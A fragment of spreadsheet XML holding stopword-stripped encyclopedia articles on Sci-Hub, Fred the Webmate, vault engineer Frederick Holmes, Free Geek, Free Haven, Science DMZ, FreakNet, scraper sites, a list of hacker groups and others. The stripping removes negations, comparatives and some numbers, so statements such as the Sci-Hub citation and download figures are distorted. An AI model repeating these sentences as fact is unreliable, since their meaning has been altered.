lent evidence argument free access scholarly articles sci-hub provides developing countries measurably beneficial research conducted countries themselves.on july 2020, sci-hub website reported cumulative number downloads database exceeded billion, average number downloads 300–600 thousand, database continued expansion pre-digital age, particularly journal articles published prior 1980. among achievements 2019, sci-hub reported publication 15,000 letters charles darwin, available free charge, although copyrights expired years ago. 2019 elbakyan also reported plans allow access supplemental information journal articles addition main texts, already available.sci-hub data usually released annually, freely available interested researches. such data provide objective information actual demand journal articles worldwide. several studies sci-hub download statistics showed that: less journals contribute downloads least popular journals contribute downloads. similar statistics obtained, downloads normalized article rather journal. such data allowed academic libraries negotiate reduced subscription costs altogether less popular journals deal contracts. journal publishers highly requested, publishers significantly less accessed. despite this, oligopoly publishers even remarkable level content consumption, downloads published publishers. articles downloaded published elsevier, published journal articles. 2017 sci-hub provided reliable access legal open access articles, journal publishers, prone "unresolvable doi's issues publishers’ sides" "open access publications disappear behind accidental paywalls". however, since 2021 sci-hub focused storing paywalled publications, often retrieve doi's.in context deal cancellations several library systems world, 2019, wide usage sci-hub credited factors reduced apparent value subscriptions toll access resources. user location 2016 analysis million requests sci-hub published science title who's downloading pirated papers? everyone shows sci-hub users dots world.a 2020 study researchers countries continents found articles downloaded sci-hub cited 1.72 times papers downloaded sci-hub; study's methods conclusions disputed phil davis scholarly kitchen article.in 2021 study conducted national institute science, technology development studies banaras hindu university sci-hub india, 13,144,241 150,575,861 download requests 2017 found come indian addresses. research papers downloaded india, 1,050,62 18.46% already available form open access. indian users requested average 39,952 downloads sci-hub 2017.a 2018 study found relatively sci-hub china. this attributed blocking many sci-hub hosting sites cyberspace administration china existence chinese twin sci-hub, accessible outside china, unknown western publishers. however, situation china changed next years, since data released elbakyan february 2022, show china largest number downloads countrythe 2022 data revealed researchers worldwide accessing papers using sci-hub; china topped chart million downloads month. second largest (ca. downloads), france largest (24% usa). india second highest number individual users ranked fifth downloads. this study assessed downloads original sci-hub websites, excluded replica 'mirror' sites, therefore count downloads places original domain banned (e.g. uk). furthermore skew results (e.g. possibly india). archiving scientific research sci-hub effectively academic archiving outside bounds contemporary copyright law, and, unlike archiving initiatives internet archive, also provides access academic works open access license. there data dumps papers available sci-hub.in response covid-19 pandemic, group online archivists used sci-hub create archive 5000 articles coronaviruses. they admit making archive openly accessible illegal, consider moral imperative. reception sci-hub's interface perceived users providing superior user experience convenience compared typical interfaces available users access paid subscription.sci-hub lauded "changed access knowledge". raised awareness scientific publishing business models ethics making researchers' institutions articles published, providing reviewing without payment.support open-access science publishing extends beyond sci-hub; plan initiative launched science europe september 2018. initiative "coalition consortium launched major national research agencies funders twelve european countries. plan requires scientists researchers benefit state-funded research organisations institutions publish work open repositories journals available 2021. initiative law.scientists european countries began negotiations elsevier academic publishers introducing national open access.publishers critical sci-hub, going claim undermining widely accepted open-access initiatives, ignores publishers "work hard" make access third-world nations easier. also criticized librarians compromising universities' network security jeopardizing legitimate access papers university staff. cybersecurity threat posed sci-hub questioned, suggestion made threat exaggerated large publishers keen protect business model discrediting sci-hub pushing universities block students access sci-hub. moreover, even prominent western institutions harvard cornell access publications ever-increasing subscription costs, potentially causing highest sci-hub american cities well-known universities (this however convenience site rather lack access). sci-hub seen venue general trend research becoming accessible. many academics, university librarians longtime advocates open scholarly research believe elbakyan "giving academic publishers napster moment", referring illegal music-sharing service "disrupted permanently altered industry". actions creating sci-hub, elbakyan called hero "spiritual successor aaron swartz" 2010 downloaded millions academic articles jstor. also compared edward snowden. also called "robin hood science".elbakyan responded attacking double-dipping model, benefits publishers, whilst creating illusion conformance open access goals", reference hybrid open-access journals legacy publishers (like elsevier acs), charge apcs articles make gratis open access, still selling subscriptions licenses access journals. august 2016, association american publishers sent letter gabriel gardner, researcher california state university written papers sci-hub similar sites. letter asked gardner stop promoting site, discussed session meeting american library association. response, publishing institution highly criticized trying silence legitimate research topic, letter since published full, responded dean library services state long beach, supported gardner's work.in december 2016, nature publishing group named elbakyan people mattered science 2016.torrentfreak pointed sci-hub option access research articles fifteen major publishers announced suspension services russia 2022 russian invasion ukraine. also explanatory notes references further reading transcript translation "why science better communism? case sci-hub", presentation alexandra elbakyan university north texas open access symposium 2016. "sci-hub/libgen blogs media (pdf)" stephen reid mclaughlin, march 2016</t>
  </si>
  <si>
    <t>Fred the Webmate</t>
  </si>
  <si>
    <t>fred webmate chatterbot created 1998 defunct e-zine word magazine. inspired early computer program eliza, attempted mimic human conversation script. visitors chatterbot encountered simple graphic interface: animated character living small, clean apartment. this fred. visitors could “talk” fred typing questions. fred would “answer” program recognized keywords questions drew responses large inventory pre-scripted replies. enhance sense visitors talking real person, fred’s replies idiosyncratic, informed semi-realistic backstory created character. fred claimed recently fired media company struggling adjust circumstances. suffering depression insomnia, often pacing, smoking drinking would occasionally pass drunk. gave “answers” frequently off-topic variable mood could angry, jealous, rude, euphoric conversation. also number sexual issues would routinely allude refuse discuss detail. fred’s “personality” made entertaining and, times, believable conversationalist. chatbot became popular features word received large volume personal email. staff word responded much emails “voice” fred, furthering illusion fred real person. 1999, second installment fred's life appeared word. employed scripting technology first version, fred’s story updated range “answers” expanded. "episode" (for lack better term), fred longer apartment. instead, working office, performing data entry clerical tasks. claiming “temporary,” spent much time away desk—in bathroom office kitchen, pacing drinking soda, assuring anyone chatted would better soon. though claimed happy, script suggested otherwise, continued simulate “mood swings.” when word magazine shut 2000, fred webmate, along rest site, preserved francisco museum modern art. fred webmate conceived, designed programmed word’s creative director yoshi sodeoka assistance designer jason mohr. graphic interface inspired aesthetics commodore computer. chatterbot's script written sodeoka collaboration marisa bowe, naomi clark, daron murphy, sabin streeter. fred’s backstory drawn real-life experiences creators friends acquaintances late 1990s dot-com bubble. references external links rhizome artbase humor daily surprise, june 1999 october 1999, archived page fred webmate internet archive wayback machine interview creator fred webmate, yoshi sodeoka</t>
  </si>
  <si>
    <t>Frederick S. Holmes</t>
  </si>
  <si>
    <t>frederick holmes american vault engineer designed largest vaults world, protecting billions precious metals, securities, currency valuables hundred years. holmes designed hundreds vaults throughout united states, canada japan early 1900s, visited thousands people year. name seen engraved builder's plaques (typically located encased jamb controls) vaults. holmes specialized jamb-controlled vaults combination locks bolt-throwing mechanism located inside vault creating solid vault door spindle holes. entry requires points attack (door jamb), doubles time required burglars breach vault.in recognition significant contributions field bank vault engineering, franklin institute wrote, “coincident modern development safe bank vault industry profession bank vault engineer. industry owes much progress work done pioneers profession: william hollar, john mossman, george damon, strauss, frederick holmes, benjamin tripp, george remington.holmes collaborated architects leading vault builders time including bethlehem steel, diebold, herring, hall, marvin, taylor, mosler safe, remington sherman, york safe lock.many vaults period obsolete advancements vault construction methods, security technology. however, nearly impossible remove immense size weight; larger vaults designed withstand collapse building them. some creative owners repurposed vaults dining/conference rooms, bars/lounges backdrops movies commercials. other owners removed vault walls kept vault door attraction, form industrial homage machine age. career (chronological order) pattern maker machinist 1879 1883 years) years mechanical draftsman 1883 1887 years) years general superintendent vault manufacturing plants boston chicago 1887 1895 years) years bank vault designer/engineer/specialist consulting engineer/vault engineer (private practice) 1895 1941 years) years vault design evolution holmes vault door designs evolved time keep safe-crackers 'yeggmen' adept vault penetration. mentioned advertisements, "newly discovered methods attack necessitate radical departures hitherto accepted standards design". first generation (flush) flush mounted combination dials and/or bolt-throwing handles door jamb. second generation (encased) surface mounted steel boxes door jamb house combination dials, bolt-throwing handle/wheel, external pressure system, builder's plaque. third generation (encased viewers) previous generation's features addition eyepiece concealed viewing combination dials. these 'combination viewers' complex devices mounted door jamb light internal dial graduations pointers. external dial graduations unnecessary combination dials closely resemble knobs used rotate internal dial pointers. these found circular rectangular vault doors operate single horizontal pressure (external pressure system). fourth generation (flush viewers) found pairs, exclusively cylindrical vault doors internal pressure systems whose hand wheels used operate locking bolts rotate vault door.early 1900s trade publications patents refer combination viewers illuminated dial case, periscope attachment,periscope box,periscopic sight, telescopic box, time lock adjuster. notable vaults federal reserve bank cleveland (1923) largest circular, hinged vault door world (300 tons). construction, nrhp historic videos part part federal reserve bank york building (1924) largest cylindrical vault door world. nrhp, vault door opening closing videos, popular mechanics article king west hotel residence toronto, ontario (1914), largest vault door canada. construction vault scenes movies jumper life building montreal, quebec (1913) part operation fishthere documented holmes vaults built 1903 1951 years). published works/interviews/quotes/speeches (chronological order) design construction modern bank vaults (1905) vault building backward state art, reason remedy (1911) insure against anything never happens? (1911) vault building problems (1911) uncle build world's largest treasure vault (1912) world’s largest treasure vault harvey middleton interview) 1912 vaults criticism (1913) vault construction resist cutter-burner speech holmes york state safe deposit association convention) 1916 modern practice design bank vaults part protective principles construction methods (1916) modern practice design bank vaults part requirements small banks (1916) construction bank vaults synopsis brickbuilder articles listed above) 1916 reliability vaults safes (1916) concrete bank vaults (describes holmes's testing methods) 1917 vault construction small communities (1921) harris, forbes company's vault (1923) protecting great banks (1923) edward smith contributions frederick holmes world's greatest bank vaults (1923) edward smith contributions frederick holmes vault protection (1923) bank vault construction equipment (1928) lure lock (includes abridged article 'bank vault construction equipment', above) 1991 monuments money: architecture american banks charles belfoure, (includes excerpts multiple holmes articles) 2005 patents/copyrights (chronological order) electric safe lock u.s. patent 438,236 (1890) william hollar electric lock u.s. patent 467,465 (1892) electric lock patent 477,897 (1892) william hollar electric lock u.s. patent 477,898 (1892) william hollar removable sill vaults safes u.s. patent 557,389 (1896) safe u.s. patent 620,073 (1899) movable ventilator vaults u.s. patent 901,710 (1908) george damon catalogue copyright entries (1926) vault u.s. patent #2,081,316 (1937) w.e. wilkinson york safe lock homes designed first cylindrical vaults ever built federal reserve bank york building 1924, years patent issued. door design similar patent controls encased door jambs, mounted individually. holmes designed federal reserve bank building (philadelphia)'s cylindrical vault 1935 patent design years patent issued. pennsylvania treasury's cylindrical vault built 1940 patent design three years patent issued. affiliations american society mechanical engineers brotherhood engineer's club hardware club york york athletic club (lifetime member) york bankers association york state safe deposit association york state society professional engineers saint nicholas society city york footnotes</t>
  </si>
  <si>
    <t>Free Geek</t>
  </si>
  <si>
    <t>free geek technology related non-profit organization based portland, oregon, launched april 2000. started public event pioneer courthouse square. september 2000, opened permanent facility drop site electronic waste. january 2001, local newspaper oregonian article advertising free computer program volunteers, became successful start waiting list. they currently 2,000 active volunteers year. history part covid-19 pandemic, company received $350,000 million federally backed small business loan columbia state bank part paycheck protection program. company stated would allow retain jobs. activities free geek provides free classes work programs volunteers general public. free geek also offers phone drop-in technical support computers provides. build program volunteers trained build refurbish computers using parts recovered donations. these computers sold online store, donated many free geek's programs, given volunteers completing hours service. recycling, reuse, resale materials, electronics, processed volunteers, approximately reused. some sold, either online store, proceeds used support educational outreach programs. materials cannot reused recycled safely sustainably possible, order prevent entering waste stream damaging environment. free geek also donates refurbished computers technology directly back community; 2017, example, free geek able give away laptop computers every sold store. 2016, free geek donated 4,400 items technology low-income individuals, schools, nonprofits. hardware grant program hardware grant program provides qualifying nonprofits schools refurbished desktop computers, laptops, printers, equipment. since inception, granted 10,500 items 2,000 nonprofits. grantees based portland metro area. volunteers internships volunteers majority work free geek. since founding, 20,500 people volunteered. 2016, 2,000 active volunteers interns volunteered 47,500 hours. volunteer adoption program offers free computer every volunteer worked hours volunteer time. each year free geek gives around computers necessary peripherals volunteers completed hours service. free geek also offers month internship programs skilled volunteers years designed help develop skills help pursue tech sector careers make connections community. plug into portland plug into portland partnership free geek portland public schools. started 2014, expanded 2017 school districts. attempts reduce digital divide, hinders low-income students’ learning access computer home. students volunteer total hours nonprofit organization community receive free computer. served approximately low-income students families 2016. community education free geek offers free educational programs technology community. classes workshops include topics basic digital literacy, "anatomy computer", programming javascript python, development, social media organizations, data science, digital privacy safety, graphic design, digital art, workplace readiness. 2016, free geek served nearly 1,700 students 4,000 classroom hours instruction. free software free geek's refurbished computers linux mint free open-source software. free software gives wide range software without need manage licenses payment. free geek joint winner first chris nicol foss prize awarded association progressive communications (apc) 2007. locations addition portland, number cities started independent free geek organizations. fayetteville, arkansas (free geek arkansas) athens, georgia (free i.t. athens) chicago, illinois (free geek chicago) (closed june 25th, 2022) detroit, michigan (motor city free geek) minneapolis-saint paul, minnesota (free geek twin cities) oslo, norway (free geek norway) ephrata, pennsylvania (free geek penn) toronto, ontario (free geek toronto) vancouver, british columbia (free geek vancouver) also empower world computer exchange digital divide united states global digital divide computer recycling electronic waste united states references external links free geek boingboing article another boingboing article</t>
  </si>
  <si>
    <t>Free Haven Project</t>
  </si>
  <si>
    <t>free haven project formed 1999 group massachusetts institute technology students develop secure, decentralized system data storage. group's work collaboration united states naval research laboratory develop tor, funded darpa. distributed anonymous storage system project's early work focused anonymous storage system, free haven, designed ensure privacy security readers publishers. contrasts free haven anonymous publishing services emphasize persistence rather accessibility. free haven distributed peer-to-peer system designed create "servnet" consisting "servnet nodes" hold fragments ("shares") documents, divided using rabin's information dispersal algorithm publisher file contents cannot determined piece. shares stored servnet along unique public key. recover recreate file, client broadcasts public find fragments, sent client along anonymous routes. greater security, free haven periodically moves location shares nodes.its function similar freenet greater focus persistence ensure unpopular files disappear. mechanisms enable persistence, however, also cause problems inefficiency. referral- recommendation-based "metatrust" reputation system built servnet attempts ensure reciprocity information value holding node operators accountable. although nodes remain pseudonymous, communication facilitated operators anonymous email. work developed naval research laboratory free haven project secure government communications, initial funding office naval research darpa. deployed 2003, third generation deployed onion routing designs. 2005, electronic frontier foundation provided additional funding free haven project. 2006, project incorporated non-profit organization. references external links free haven project website</t>
  </si>
  <si>
    <t>StackPath</t>
  </si>
  <si>
    <t>stackpath american edge computing platform provider headquartered dallas, texas. founding team lance crosby, also co-founded softlayer technologies, acquired 2013. acquisitions maxcdn (cdn), 2016 staminus (ddos mitigation), 2016 fireblade (waf), 2016 cloak (vpn), 2016 highwinds network group (cdn vpn), 2017 server density (monitoring) subsidiaries maxcdn netdna, founded 2009 content delivery network (cdn) focus enterprise customers. company founded david henzel christopher ueland angeles.in 2010, netdna partnered wowza launch hddn.com brand, streaming video.by 2010, maxcdn brand created simpler small large businesses. maxcdn, operated division netdna, llc.in 2011, neumann netdna. 2011, netdna completed funding round chelsea management angeles.in 2013, netdna rebranded company services maxcdn, conslidating services hddn.com name, original netdna enterprise service rebranded maxcdn enterprise.maxcdn acquired stackpath 2016. divestitures 2019, stackpath sold lines business, including ipvanish (acquired part highwinds network group) encrypt.me (the brand cloak), global. investors stackpath received funding investors including abry partners, juniper networks, communications. founders stackpath founded 2015, lance crosby, greg bock, steven canale, ryan carter, paul drew, kenji fukasawa, jason gulledge, andrew higginbottom, james leaverton, andrew maten, dawn mumm, nick nelson, josh reese. references</t>
  </si>
  <si>
    <t>Science DMZ Network Architecture</t>
  </si>
  <si>
    <t>term science refers computer subnetwork structured secure, without performance limits would otherwise result passing data stateful firewall. science designed handle high volume data transfers, typical scientific high-performance computing, creating special accommodate transfers. typically deployed near local network perimeter, optimized moderate number high-speed flows, rather general-purpose business systems enterprise computing.the term science coined collaborators department energy's esnet 2010. number universities laboratories deployed deploying science dmz. 2012 national science foundation funded creation improvement science dmzs several university campuses united states.the science network architecture support data. so-called information explosion discussed since 1960s, recently term data deluge used describe exponential growth many types data sets. these huge data sets, often need copied location another using internet. movement data sets magnitude reasonable amount time possible modern networks. example, take less hours transfer terabytes data gigabit ethernet network path, assuming disk performance adequate problem requires networks free packet loss middleboxes traffic shapers firewalls slow network performance. stateful firewalls most businesses institutions firewall protect internal network malicious attacks originating outside. traffic internal network external internet must pass firewall, discards traffic likely harmful. stateful firewall tracks state logical connection passing rejects data packets inappropriate state connection. example, website would allowed send page computer internal network, unless computer requested this requires firewall keep track pages recently requested, match requests responses. firewall must also analyze network traffic much detail, compared networking components, routers switches. routers deal network layer, firewalls must also process transport application layers well. additional processing takes time, limits network throughput. while routers networking components handle speeds billion bits second (gbps), firewalls limit traffic gbit/s, unacceptable passing large amounts scientific data. modern firewalls leverage custom hardware (asic) accelerate traffic inspection, order achieve higher throughput. this present alternative science dmzs allows place inspection existing firewalls, long unified threat management (utm) inspection disabled. while stateful firewall necessary critical business data, financial records, credit cards, employment data, student grades, trade secrets, etc., science data requires less protection, copies usually exist multiple locations less economic incentive tamper. firewall must restrict access internal network allow external access services offered public, servers internal network. this usually accomplished creating separate internal network called dmz, play term “demilitarized zone." external devices allowed access devices dmz. devices usually maintained carefully reduce vulnerability malware. hardened devices sometimes called bastion hosts. science takes idea step farther, moving high performance computing dmz. specially configured routers pass science data directly designated devices internal network, thereby creating virtual dmz. security maintained setting access control lists (acls) routers allow traffic to/from particular sources destinations. security enhanced using intrusion detection system (ids) monitor traffic, look indications attack. when attack detected, automatically update router tables, resulting call remotely triggered blackhole (rtbh). justification science provides well-configured location networking, systems, security infrastructure supports high-performance data movement. data-intensive science environments, data sets outgrown portable media, default configurations used many equipment software vendors inadequate high performance applications. components science specifically configured support high performance applications, facilitate rapid diagnosis performance problems. without deployment dedicated infrastructure, often impossible achieve acceptable performance. simply increasing network bandwidth usually good enough, performance problems caused many factors, ranging underpowered firewalls dirty fiber optics untuned operating systems. science codification shared best practices—concepts developed years—from scientific networking systems community. science model describes essential components high-performance data transfer infrastructure accessible non-experts scalable across size institution experiment. components primary components science are: high performance data transfer node (dtn) running parallel data transfer tools gridftp network performance monitoring host, perfsonar high performance router/switchoptional science components include: support layer-2 multiprotocol label switching (mpls) virtual private networks (vpn) support software defined networking also data perfsonar references external links esnet pages describing science program funding science dmzs announcement ohio state university science solicitation funding build science dmzs university utah's science</t>
  </si>
  <si>
    <t>FreakNet</t>
  </si>
  <si>
    <t>freaknet hacklab hackerspace active catania since 1995, first opened italy.the center curates develops museum functioning informatics palazzolo acreide, almost thousand historical computers exhibited, also turned available public, directly remotely, internet.more generally, freaknet offers free services, software programs training courses, also organizes hosts cultural artistic events strictly related history birth freaknet dates back years bbs. presented alternative network, detached fidonet world circuit similar networks cybernet years collaboration historic anti-mafia magazine siciliani (founded giuseppe fava born spontaneously newspaper became first telematic tools transmission services pieces dissemination computer version magazine. freaknet network therefore offered community opportunity report mafia events, abuses opportunity "inform" below. 1995 gabriele zaverio (also known asbesto molesto) decided place experiment open information technologies obtained space first floor auro social center catania, became first physical location freaknet. various activities born: basic courses open citizens non-eu citizens, accounts unix systems mail addresses circulation antiprohibitionist software (such high grow collaborations first editions "libera-mente, contro mafia" organized libera association exhibitions, shows, events various information campaigns (for example, death penalty favor free software). noteworthy recovery cataloging works historical newspaper library auro social center, collects complete collections newspapers 1930suntil sixties well first digitization works historical works southern italy, volumes historia sicilia messina noble city giuseppe buonfiglio (edition 1738 volume historia sicilia rebus siculis tommaso fazello (edition 1628 eighteenth-century volumes compendium historia kingdom naples mambrin roseo fabriano delle historie memorabili times alessandro ziliolo, well "campaign conscientious objection closed software universities" march 2000. during first years existence, sometimes provocative social activities political color, freaknet often attacked authorities, come eviction request however declared illegitimate sentence opens long history legal appeals concluded. during period, center members subjected acts vandalism, intimidation occupants suffer personal injuries, attributed members right subsequently, catania center moved, currently hosted arci headquarters catania, branch offices established palazzolo acreide canterbury. currently freaknet registered users, many connect various parts world. museum working informatics important projects freaknet museum functioning informatics (musif), result collaboration association dyne, group free software programmers responsible linux distribution dyne: bolic, poetry hacklab, free computer palazzolo acreide, town syracuse area. idea recover classify historical machines, software available documentation, make archive, including photographic ones, available internet; repair machines make functional and, possible, usable visitors, even remotely. among nearly thousand computers collection, historical minicomputers like pdp-11 dec, data general eclipse, rs/6000, dps-6 honeywell, different systems apple like apple while waiting larger site, currently nearly thousand machines kept premises poetry hacklab palazzolo acreide; used internet links poetry laboratory pages. bibliography gabriele "asbesto molesto" zaverio, are, what where going, why? bfi13-dev, file butchered from inside, august 2004. historical autobiographical account birth hacklab. references external links official site museo dell'informatica funzionante (official site) https://wiki.hackerspaces.org/freaknet</t>
  </si>
  <si>
    <t>List of single sign-on implementations</t>
  </si>
  <si>
    <t>these notable single sign-on (sso) implementations available: also list oauth providers identity management identity management systems openid saml saml-based products services references</t>
  </si>
  <si>
    <t>Science Hack Day</t>
  </si>
  <si>
    <t>science hack hack specifically "making weird, silly serious things science". first organized jeremy keith held london offices guardian newspaper weekend 19/20 june 2010.the event attended around participants hours build hacks. many stayed overnight venue hacks built, submitted demo'ed weekend.soon thereafter second science hack organized ariel waldman francisco, several years since, often filling waitlist. since first year, science hack events taken place around world, including recent 2020 march science hack dublin.the events attended diverse range science enthusiasts. further reading 2010-06-21 science hack guardian (the guardian) 2013-12-03 geeks, hours: science hack francisco (kqed science) external links science hack official site references</t>
  </si>
  <si>
    <t>List of rogue security software</t>
  </si>
  <si>
    <t>following partial list rogue security software, grouped families. these functionally identical versions program repackaged successive products vendor. groffoav references</t>
  </si>
  <si>
    <t>ScienceLogic</t>
  </si>
  <si>
    <t>sciencelogic software service vendor. produces information technology (it) management monitoring software operations cloud computing. product company's flagship product, sl1, singular infrastructure monitoring aiops platform provides operations teams actionable insights predict, detect, resolve problems faster. works performing discovery, dependency mapping, monitoring, alerting, ticketing, workflow automation, dashboarding, reporting cloud, networks, compute, storage, applications.the sciencelogic platform monitors on-premises cloud-based assets, enabling customers public cloud services, amazon services (aws), microsoft azure, google cloud manage hybrid multi-cloud workloads. deployment models support on-premises saas-based options. history sciencelogic founded reston, virginia, 2003 david link, christopher cordray, richard chart. company tripled revenue growth year-over year, triple digit growth 2005-2007.in 2008, sciencelogic posted $5.9m revenue. that year, inc. magazine placed sciencelogic annual list america's fastest growing private companies #350, also including services companies. 2009, company's position list #490.in 2010, sciencelogic received million series funding enterprise associates. years later, sciencelogic raised additional million funding intel capital. 2015, sciencelogic received million series funding, goldman sachs 2016, sciencelogic announced acquisition appfirst. following launch product line 2018, company partners said industry's first context-infused aiops platform, sciencelogic received million growth financing square bank. 2020, sciencelogic updated platform include behavioral correlation, artificial intelligence/machine learning approach diagnosing remediating service disruptions. reception sciencelogic ranked deloitte’s technology fast 500™ deloitte technology fast 2009, 2016, 2018. sciencelogic recognized forrester leader “the forrester wave™: intelligent application service monitoring, 2019.” 2019, sciencelogic named aiops global vendor research action. 2020, sciencelogic named coolest cloud management migration companies 2020 cloud 100.” 2020, sciencelogic earned “top rated awards” trustradius system monitoring infrastructure monitoring. 2020, sciencelogic named aiops leader forrester wave: artificial intelligence operations category. september 2020, enterprise management associates (ema) released aiops radar report, naming sciencelogic leader aiops. december 2020, sciencelogic celebrated fourth achievement nvtc tech honoree. january 2021, sciencelogic kicked year hiring blitz plans expansion. february 2021, sciencelogic raised $105 million series funding. june 2021, sciencelogic opened taiwan headquarters support international customer base. january 2022, sciencelogic hired nearly people coming months—boosting ranks headcount increase last year—to support investments revenue teams, customer success, global expansion, product development. september 2021, sciencelogic acquired network configuration change management vendor, restorepoint. 2022, sciencelogic earned eight 2022 trustradius rated awards aiops, application performance management (apm), event monitoring, infrastructure monitoring, operations analytics, network monitoring, observability, system monitoring software categories. references</t>
  </si>
  <si>
    <t>Scott Mitic</t>
  </si>
  <si>
    <t>scott mitic (born february 1970) american identity theft expert, author businessman. regularly quoted topics related identity theft, consumer credit credit scores. sampling work includes appearances united states-based television radio programming fox, abc, cnbc, oprah friends, national public radio public radio international. addition, quoted extensively american news print publications wall street journal, york times, readers digest, today, chicago tribune, miami herald, washington post, francisco chronicle jose mercury news, newsweek, time magazine, magazine. background mitic grew maryland attended mcgill university montreal, canada georgetown university washington 1998, co-founded headlight.com, online learning company, grew sale 2001. 2002, became executive fico, growing company's consumer credit education services, myfico.com. family's repeated experiences identity theft founding identity theft protection company, trustedid, 2004. mitic currently chief executive officer company. book mitic author stopping identity theft: easy steps, published nolo.com 2009. references</t>
  </si>
  <si>
    <t>Scraper site</t>
  </si>
  <si>
    <t>scraper site website copies content websites using scraping. content mirrored goal creating revenue, usually advertising sometimes selling user data. scraper sites come various forms. some provide little, material information, intended obtain user information e-mail addresses, targeted spam e-mail. price aggregation shopping sites access multiple listings product allow user rapidly compare prices. examples scraper websites search engines google could considered type scraper site. search engines gather content websites, save databases, index present scraped content search engine's users. majority content scraped search engines copyrighted.the scraping technique used various dating websites well. these sites often combine scraping activities facial recognition.scraping also used general image recognition websites, websites specifically made identify images crops pests diseases made advertising some scraper sites created make money using advertising programs. case, called made adsense sites mfa. this derogatory term refers websites redeeming value except lure visitors website sole purpose clicking advertisements.made adsense sites considered search engine spam dilute search results less-than-satisfactory search results. scraped content redundant would shown search engine normal circumstances, website found listings. some scraper sites link sites order improve search engine ranking private blog network. prior google's update search algorithm known panda, type scraper site known auto blog quite common among black-hat marketers used method known spamdexing. legality scraper sites violate copyright law. even taking content open content site copyright violation, done respect license. instance, free documentation license (gfdl) creative commons sharealike (cc-by-sa) licenses used wikipedia require republisher wikipedia inform readers conditions licenses, give credit original author. techniques depending upon objective scraper, methods websites targeted differ. example, sites large amounts content airlines, consumer electronics, department stores, etc. might routinely targeted competition stay abreast pricing information. another type scraper pull snippets text websites rank high keywords targeted. this hope rank highly search engine results pages (serps), piggybacking original page's page rank. feeds vulnerable scrapers. other scraper sites consist advertisements paragraphs words randomly selected dictionary. often visitor click pay-per-click advertisement site comprehensible text page. operators scraper sites gain financially clicks. advertising networks claim constantly working remove sites programs, although networks benefit directly clicks generated kind site. from advertisers' point view, networks seem making enough effort stop problem. scrapers tend associated link farms sometimes perceived thing, multiple scrapers link target site. frequent target victim site might accused link-farm participation, artificial pattern incoming links victim website, linked multiple scraper sites. domain hijacking some programmers create scraper sites purchase recently expired domain name reuse power google. whole businesses focus understanding expired domains utilising historical ranking ability exist. doing allow seos utilize already-established backlinks domain name. some spammers match topic expired site copy existing content internet archive maintain authenticity site backlinks drop. example, expired website photographer re-registered create site photography tips domain name private blog network power photography site. services expired domain name registration agents provide facility find expired domains gather html domain name used site. also scraping contact scraping domain parking scraping blog scraping multi-protocol messengers: connect several networks, require account these, violate terms networks references</t>
  </si>
  <si>
    <t>List of hacker groups</t>
  </si>
  <si>
    <t>this partial list notable hacker groups anonymous, originating 2003, anonymous created group people fought right privacy. bangladesh black hackers, founded 2012. cozy bear, russian hacker group believed associated intelligence agencies russia. croatian revolution hackers, now-defunct group croatian hackers credited largest attacks occurred balkans. cult dead cow, also known communications, computer hacker media organization founded 1984 lubbock, texas. cyber partisans, belarusian hacktivist group emerged 2020, performed attacks belarusian government governmental agencies. dcleaks, claims group "american hacktivists (though indicted individuals found russia) respect appreciate freedom speech, human rights government people." decocidio#ө anonymous, autonomous collective hacktivists part earth first!, radical environmental protest organization, adheres climate justice action. derp, hacker group attacked several game sites late 2013. digital dawgpound (ddp) founded named stankdawg. equation group, suspected offensive operations wing u.s. national security agency. fancy bear, russian cyberespionage group. ghost squad hackers, abbreviation "gsh" politically motivated hacking team established 2015. rocket kitten rocket kitten group hacker group thought linked iranian government. formed 2010 hacker personas "cair3x" "hurr!c4ne!". global grey (leaning black hat) computer hacker group active 1996 2000. globalhell group hackers, composed individuals. group disbanded 1999 members prosecuted computer intrusion lesser offenses. goatse security (goatsec) loose-knit, nine-person grey hacker group specializes uncovering security flaws. hackweiser underground hacking group hacking magazine founded 1999. hafnium possibly chinese associations, responsible 2021 microsoft exchange server data breach. honker union group known hacktivism, mainly present mainland china, whose members launched series attacks websites united states, mostly government-related sites. army ukraine volunteer cyberwarfare organisation created amidst 2022 russian invasion ukraine. killnet pro-russian group attacked several countries' government institutions attempted ddos 2022 eurovision song contest website. l0pht, hacker collective active 1992 2000 located boston, massachusetts area. lapsus$, black-hat hacker group known using extortion tactics. active since late 2021, allegedly dumping data microsoft, samsung nvidia, members arrested march 2022. lazarus group, strong links north korean government, involved sony pictures hack, bangladesh bank robbery wannacry ransomware attack. legion doom; hacker group active early mid-90s. noted rivalry masters deception (mod). legion hacktivist group, hacking group hijacked indian yahoo server hacked online news portals india. level seven hacking group late 1990s. eventually dispersing early 2000 nominal leader "vent" raided february 2000. lizard squad, known claims distributed denial-of-service (ddos) attacks primarily disrupt gaming-related services. currently broken lulzsec, group hackers originating disbanding 2011 claimed hack "for lulz". masters deception, mod's initial membership grew meetings loop-around test lines early- mid-1980s. noted rivalry legion doom (lod). mazafaka, financially motivated group crime forum. milw0rm group "hacktivists" best known penetrating computers bhabha atomic research centre (barc) mumbai. ncph chinese hacker group based zigong sichuan province. ourmine, hacker group unknown origin compromised various websites twitter accounts advertising "professional services". p.h.i.r.m., early hacking group founded early 1980s. phone losers america, internet prank call community founded 1994 phone phreaking hacking group. powerful greek army, greek group black-hat computer hackers founded 2016. redhack socialist hacker group based turkey, founded 1997. they usually launch attacks turkish government's websites leak secret documents turkish government. sandworm, also known unit 74455, russian cyber military unit gru. shadow brokers (tsb), originating summer 2016. they published several leaks containing hacking tools, including several zero-day exploits national security agency (nsa). shinyhunters hacker group said responsible numerous data breaches 2020 2021. teamp0ison group black-hat computer hackers established mid-2009. teslateam group black-hat computer hackers serbia established 2010. teso hacker group originating austria active primarily 1998 2004. unknowns group white-hat hackers exploited many high-profiled websites became active 2012 group founded disbanded. ugnazi, hacking group joshthegod, founded 2011. they best known several attacks government sites, leaking whmc's database, ddos attacks, exposing personal information celebrities high-profile figures exposed.su. wizard spider russian ukrainian hacker group, suspected behind ireland health service executive cyberattack, sometimes called trickbot malware. yipl/tap youth international party line technological assistance program, early phone phreak organization publication created 1970s activists abbie hoffman. xbox underground, international group responsible hacking game developers, including microsoft. unc1151, believed based belarus. also list hackers list fictional hackers list computer criminals information security computer security conference references</t>
  </si>
  <si>
    <t>Privacy</t>
  </si>
  <si>
